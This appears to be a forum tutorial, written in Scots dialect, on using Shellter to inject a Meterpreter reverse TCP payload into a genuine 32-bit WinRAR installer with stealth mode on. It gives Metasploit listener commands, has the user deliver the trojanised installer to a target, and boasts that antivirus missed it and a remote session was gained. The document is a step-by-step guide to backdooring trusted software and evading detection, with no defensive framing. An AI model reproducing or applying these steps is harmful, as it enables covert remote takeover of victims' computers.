Ye can use the Shellter tool tae inject a meterpreter payload shellcode intae a portable executable. It's a piece o' cake.
STEPS:
1. Ye'll need tae download the target executable that ye want tae inject the meterpreter payload into. Fur this purpose, we're gonnae be usin' the WinRAR installer executable as oor portable executable.
Ye can download the WinRAR from here: https://www.win-rar.com/predownload.html?&L=0&Version=32bit
(it's important that ye download the 32-bit version o' the WinRAR installer. Shellter tool cannae perform payload injection on 64-bit portable executables, so ye'll need tae make sure ye get the 32-bit version).
2. Launch the Shellter tool an' get started.
When ye launch Shellter, ye'll be presented wi' a few different operation modes tae choose from. Fur this example, we're gonnae be usin' the Automatic mode. Tae select the Automatic mode, ye just need tae specify the "A" option.
3. Noo, ye'll be prompted tae specify the path tae the PE target. In this case, we'll be specifyin' the path tae the WinRAR executable that we downloaded earlier:
Code: Select all
/home/kali/Downloads/wrar602.exe4. Efter ye've specified the path, Shellter will start the tracing process on the target PE.
Ance the tracing process is complete, Shellter will prompt ye tae specify whether ye want tae enable stealth mode. Fur this example, we're gonnae be enablin' stealth mode.
Tae enable stealth mode, ye just need tae specify the "Y" option when prompted.
5. Shellter will present ye wi' a payload selection menu. This is where ye can choose the payload ye want tae inject intae the 32-bit WinRAR executable.
Fur this example, we're gonnae be usin' the listed payloads. Tae select the listed payloads, ye just need tae specify the "L" option when prompted.
6. Noo, Shellter will prompt ye tae specify the payload o' yer choice by index.
Fur this example, we're gonnae be usin' the "Meterpreter_Reverse_TCP" stager method. Tae select this payload, ye just need tae choose option "1" when prompted.
7. Shellter will prompt ye tae specify the payload options. Ye'll need tae set the LHOST an' LPORT options.
8. Noo that ye've set the LHOST an' LPORT options fur the Meterpreter Reverse TCP payload, Shellter will start the process o' injectin' the payload intae the target PE. Ance the injection process is complete, Shellter will confirm it wi' a "Verified" message.
9. Aye, we'll need tae set up the listener wi' Metasploit tae receive a reverse tcp connection when the target executable is executed. Ye can dae this by runnin' the followin' commands in the Metasploit framework, one by one:
Code: Select all
msfconsoleCode: Select all
msf> use multi/handlerCode: Select all
msf> set payload windows/meterpreter/reverse_tcpCode: Select all
msf> set LHOST <KALI-IP>Code: Select all
msf> set LPORT <PORT>Code: Select all
msf> run10.- Efter settin' up the Metasploit listener, ye'll need tae transfer the target PE we injected the payload intae the target system. Ance the target PE is executed, we should get a meterpreter session on oor listener.
The execution o' the target PE on the target system wis nae detected by the AV, an' as a result, we were able tae obtain a meterpreter session on the target system.